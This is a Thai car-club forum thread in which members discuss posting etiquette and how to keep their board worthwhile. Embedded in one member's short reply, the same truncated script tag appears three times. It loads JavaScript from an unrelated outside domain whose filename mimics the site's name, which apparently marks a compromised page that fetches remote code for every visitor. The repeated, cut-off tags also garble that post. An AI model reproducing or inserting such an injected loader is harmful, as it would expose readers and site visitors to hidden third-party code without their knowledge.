ได้รับคำขอบคุณจาก: boss  iMan  kittidech  chengg  ~ สเตฟาน ~  CEMENT  TUI_PeTiTe  kunshybeer08  VOICEMAN  YINDEE  Manhaha  hacker  stevie_b8 
hacker

ชื่อเล่น: เซียนจ๊อบ

ตอบ: 4046

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

จันทร์, 16 พฤศจิกา 2009 16:09 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เหอะๆ... ตกเป็นเป้าเลย ฮึ่มๆ เด๋วเพิ่มให้อีกข้อหาท่าจะดี
ได้รับคำขอบคุณจาก: TUI_PeTiTe  beeladin  VOICEMAN  kunshybeer08  Rangsit 33  Manhaha  stevie_b8 
CEMENT

ชื่อเล่น: อิท

เข้าร่วม: 18 กรกฎา 2009
ตอบ: 1133

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 10852
ให้คำขอบคุณ: 2770

จันทร์, 16 พฤศจิกา 2009 16:21 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
ฮาได้อีกนะพี่แบงค์........ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: hacker  VOICEMAN  kunshybeer08  Rangsit 33  Manhaha 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
จันทร์, 16 พฤศจิกา 2009 16:25 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เห็นด้วยครับ
ได้รับคำขอบคุณจาก: hacker  beeladin  VOICEMAN  kunshybeer08  Manhaha 
YINDEE

ชื่อเล่น: ต๊อด

ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 16 พฤศจิกา 2009 16:45 - ช่วยตั้งกะทู้แบบสมควรที่จะตั้งหน่อยนะครับ
เอาหล่ะ จากที่ผม หงุดหงิดมาทั้งคืน ยันบ่ายวันนี้ (เข้าเน็ทไม่ได้ โมเด็มเน่า รถยางแท่นเครื่องขาด)

ก็ได้เวลามานั่งหน้าจอ สักที

ผมว่า ทุกอย่าง น่าจะเข้าใจกันดีแล้วนะครับ อ่อนไปบ้าง แข็งไปบ้าง
สาระเยอะ ก็น่าเบื่อ สีสรรเยอะ ก็ไร้สาระ เอากันพอดีๆ ดีกว่านะ เพื่อ ES GROUP ของเรานะครับ

อะไรที่มัน ดูแล้วขัดๆ ลองปล่อยวาง มีโอกาส ก็คุยกันด้วยเหตุด้วยผล ผมว่าน่าจะดี

จากที่ผมมองนะ บางกระทู้ขาดการไตร่ตรองในการโพส ว่าคนที่เข้ามาอ่านแล้ว เค้าจะเข้าใจไหม

บางกระทู้ มันขาดจุดมุ่งหมายในการโพส คือ โพสเพื่ออะไร อาจจะดัก เพื่อล้อเล่นกับสมาชิก

อันนี้เข้าใจได้

แต่ ไอ้ที่ขาดจุดมุ่งหมายจริงๆนั้นก็มี อย่างเช่น เมิงจะถามหา สวรรค์ วิมานไรไม่ทราบ เมื่อในนี้
ก็มีข้อมูลอยู่ค่อนข้างเยอะ ลองค้นหาดูแล้วรึยัง หรือโพสเพื่อลองวัดกระแสดู เพื่อลบล้าง
เรื่องเลว เลว ที่เคยทำไว้ ทำตัวไร้เดียงสา

ปากที่เคยมีหมา ไม่รู้ หายไปไหน บอกไว้เลย ไม่มีทาง! (ผมไม่ได้วกเข้าเรื่องนะ) 555

อ่ะต่อๆ หรืออย่าง กระทู้ ที่ผมตั้งเมื่อเร็วๆนี้ เรื่องท่อ ตั้งใจเพื่อเผยแพร่ฝีมือของร้านท่อร้านนี้
ประกอบกับรับใต้โต๊ะมาหน่อยนึง อิอิ (ล้อเล่นนะครับ)

แต่มัน กลับกลายเป็นอีกเรื่องนึงไปได้ อันนี้ขาดจิตสำนึกขาดการไตร่ตรอง
ดีที่ว่า มีผู้ดูแลบอร์ด มาจัดการตัดตอนไปซะก่อน ก่อนที่มันจะลุกลาม

ผมเองเห็นด้วย กับทั้ง บี และสมาชิกท่านอื่นๆนะครับ ที่อยากให้บอร์ด ไม่ไร้สาระเกินไป
เอาแต่พอดี พองามไม่มากเกิน

ทุกสิ่งทั้งหมด ก็อยากให้พวกเรา อดทนกันนิดนึง ในอนาคต ก็คงมี วิธีจัดระเบียบ
ให้บอร์ดของเรา ให้เป็นระเบียบเรียบร้อยมากกว่านี้ (ตอนนี้ยังอยู่ในขั้นตอนการ
ปรึกษาดำเนินการอยู่) แน่นอน .....

ปล. ผมไม่เห็นด้วย ที่จะตั้ง โซน แบ่งกลุ่มไปเลย ว่า โซนนี้ คุยกัน
อันนี้เกาไม่ถูกที่คันแน่นอน

ผมอยากให้คิดสักนิดนะครับว่า โพส ทำไม เพื่ออไร ก่อนจะโพส

หลากหลายความคิด เปิดอีกสักนิดเพื่อรับฟัง
เราเงียบเพื่อจะได้ยินสิ่งที่คนอื่นเค้าพูด เราถามเพื่อจะได้รู้ในสิ่งที่คนอื่นคิด
เราพูด เมื่อมีคนอยากฟัง รับรอง เจริญ .....

ไม่รู้มีใครคิดเหมือนผมไหม เหล้า เปรียบเสมือน บอร์ด
ทุกคน ชอบดื่ม ชอบกิน สนุกกับมัน

แต่วิธีที่จะดื่มนั้น มันมีหลายวิธี เพรียวๆ โซดาน้ำ หรือ โซดาล้วน
อันนี้ก็แล้วแต่ สุดท้ายก็กินด้วยกัน เมาด้วยกัน รักกันๆ ฝากไว้นะครับ

ปล. ไม่เคยมีสาระงี้มาก่อนเลยนะเนี่ย .... สงสัยเก็บกดหว่ะ
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.